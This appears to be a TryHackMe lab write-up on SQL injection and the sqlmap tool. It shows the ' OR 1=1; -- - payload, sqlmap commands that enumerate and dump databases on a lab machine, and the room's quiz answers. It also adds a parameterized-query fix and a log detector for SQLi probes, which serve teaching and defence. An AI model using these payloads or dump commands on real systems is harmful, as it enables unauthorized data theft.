SQLMap: The Basics
Summary
Description: Using SQLMap to automate the process of exploiting SQL vulnerabilities
SQL Injection Vulnerability
What is a SQL Injection?
We have the following User data:
Username: John
Password: JohnnyBoy123
The resulting SQL query looks like this:
SELECT * FROM users WHERE username = 'John' AND password = 'JohnnyBoy123';
If the input data is not validated in any way, this SQL query becomes vulnerable to SQL injection by modifying the password input.
Password: abc' OR 1=1; -- -
The resulting Query looks like this:
SELECT * FROM users WHERE username = 'John' AND password = 'abc' OR 1=1;-- -';
This works because the final condition (1=1) is always true, so the WHERE clause matches every row regardless of the password. The -- comments out any remaining characters in the line, including the closing quote left over from the original query.
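To see the difference between the concatenated query above and a parameterized one, here is an added example (my own code, not part of the TryHackMe room) that builds a small in-memory SQLite table with the page's John / JohnnyBoy123 entry plus one constructed extra user, then runs the page's payload through both a vulnerable and a fixed login function. The table layout and the second user are assumptions for the demo.

```python
import sqlite3

PAYLOAD = "abc' OR 1=1; -- -"  # the password input from the page


def make_db():
    """Constructed sample users table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("John", "JohnnyBoy123"), ("alice", "s3cret")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Builds the query by string concatenation, exactly like the page's example.
    Returns (query_text, matching_rows)."""
    query = (
        "SELECT * FROM users WHERE username = '" + username
        + "' AND password = '" + password + "';"
    )
    return query, conn.execute(query).fetchall()


def safe_login(conn, username, password):
    """Parameterized query: the driver passes values separately from the SQL text,
    so quotes and comment markers in the input are treated as data, not syntax."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return query, conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    q, rows = vulnerable_login(db, "John", PAYLOAD)
    print(q)          # ... password = 'abc' OR 1=1; -- -';
    print(rows)       # every row comes back: the tautology bypassed the check
    q, rows = safe_login(db, "John", PAYLOAD)
    print(rows)       # [] : no user has that literal password
```

The vulnerable function returns both rows because `OR 1=1` is true for every record and `--` discards the trailing quote; the parameterized version returns nothing for the same input, and only returns John's row when the genuine password is supplied.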
Questions
Which boolean operator checks if at least one side of the operator is true for the condition to be true?
Answer: OR
Is 1=1 in an SQL query always true? (YEA/NAY)
Answer: YEA
Automated SQL Injection Tool
SQLMap
SQLMap automates the process of discovering an SQL injection vulnerability and manipulating the database. Typing sqlmap --help lists the available options; if you would rather not set the flags manually, sqlmap --wizard guides you through the process interactively.
How to use SQLMap?
Target URL
Target URLs often have GET parameters such as http://sqlmaptesting.thm/search?cat=1. The -u flag sets the target URL in SQLMap. Cookie-based testing via the --cookie flag is also supported, since modern websites rely on sessions. With the following command, SQLMap tests the URL's parameters for SQL injection.
sqlmap -u http://sqlmaptesting.thm/search/cat=1
By using the --dbs flag, SQLMap fetches the databases.
sqlmap -u http://sqlmaptesting.thm/search/cat=1 --dbs
By combining the -D and --tables flags, SQLMap lists all tables of the database named users.
sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users --tables
To dump table data, we have to define the database with -D, then the table with -T and --dump to extract the data.
sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users -T thomas --dump
POST-based testing (logins, registration forms, etc.) can be accomplished by saving the raw HTTP request to a file and passing it with the -r [FILENAME].txt flag; SQLMap then reads the method, headers and body from that file.
Questions
Which flag in the SQLMap tool is used to extract all the databases available?
Answer: --dbs
What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
Answer: sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables
Practical Exercise
Execution
We get the following IP for the vulnerable machine: 10.82.163.238. The login is located at http://10.82.163.238/ai/login. By opening the website in the browser and looking at the devtools, we see that the following parameters are in the URL: http://10.82.163.238/ai/includes/user_login?email=test&password=test.
First, we need to scan the URL for databases by using the following command:
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" --dbs
However, this does not provide us with all databases, so we need to increase the scan level by adding an additional flag.
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" --dbs --level=5
We get the following databases as result:
[*] ai
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
Now we need to look at the tables that are located within the ai database.
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" -D ai --tables
As a result we only get the user table.
We dump the data by executing the following command:
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" -D ai -T user --dump
This returns the user data, which amounts to a single entry whose password is 12345678.
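From the defender's side, a run like the one above is noisy: SQLMap sends many requests with tautology payloads and, unless the user overrides it, a User-Agent that identifies the tool. The following added example (my own code, not part of the TryHackMe room) runs a simple check over a few constructed access-log lines in combined log format. The log lines, IP addresses and the SQLMap version string are illustrative; the User-Agent is modelled on SQLMap's default "sqlmap/<version>#stable (https://sqlmap.org)" format, and the injection patterns are deliberately minimal, based on the page's ' OR 1=1; -- - payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ai/includes/user_login?email=test&password=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /ai/includes/user_login?email=test%27%20OR%201%3D1--%20-&password=test HTTP/1.1" 200 2048 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ai/includes/user_login?email=abc%27%20AND%201%3D2&password=x HTTP/1.1" 200 400 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?cat=1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Parses one combined-log-format line into ip, method, path, status and user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Hypothetical, intentionally small pattern set modelled on the page's payload.
INJECTION_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+\d+\s*=\s*\d+", re.I),  # ' OR 1=1 / ' AND 1=2 tautologies
    re.compile(r"--\s*-?\s*$"),                          # trailing SQL line comment
]


def find_suspicious_requests(log_text):
    """Return a list of (ip, reason, decoded_path) for lines that look like SQLi probes."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ua = m.group("ua")
        decoded = unquote_plus(m.group("path"))  # payloads arrive URL-encoded
        reasons = []
        if ua.lower().startswith("sqlmap"):
            reasons.append("sqlmap user-agent")
        for pat in INJECTION_PATTERNS:
            if pat.search(decoded):
                reasons.append("injection pattern: " + pat.pattern)
                break
        if reasons:
            hits.append((m.group("ip"), "; ".join(reasons), decoded))
    return hits


if __name__ == "__main__":
    for ip, reason, path in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip}  {reason}  {path}")
```

Two of the four constructed lines are flagged: the SQLMap request (both by User-Agent and by the decoded ' OR 1=1 in the email parameter) and the curl request that carries an ' AND 1=2 probe with an ordinary User-Agent. Matching on the decoded query string rather than the User-Agent alone matters because the tool's agent string is trivially changed, whereas the tautology payloads are what the technique needs.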
Questions
How many databases are available in this web application?
Answer: 6
What is the name of the table available in the “ai” database?
Answer: user
What is the password of the email test@chatai.com?
Answer: 12345678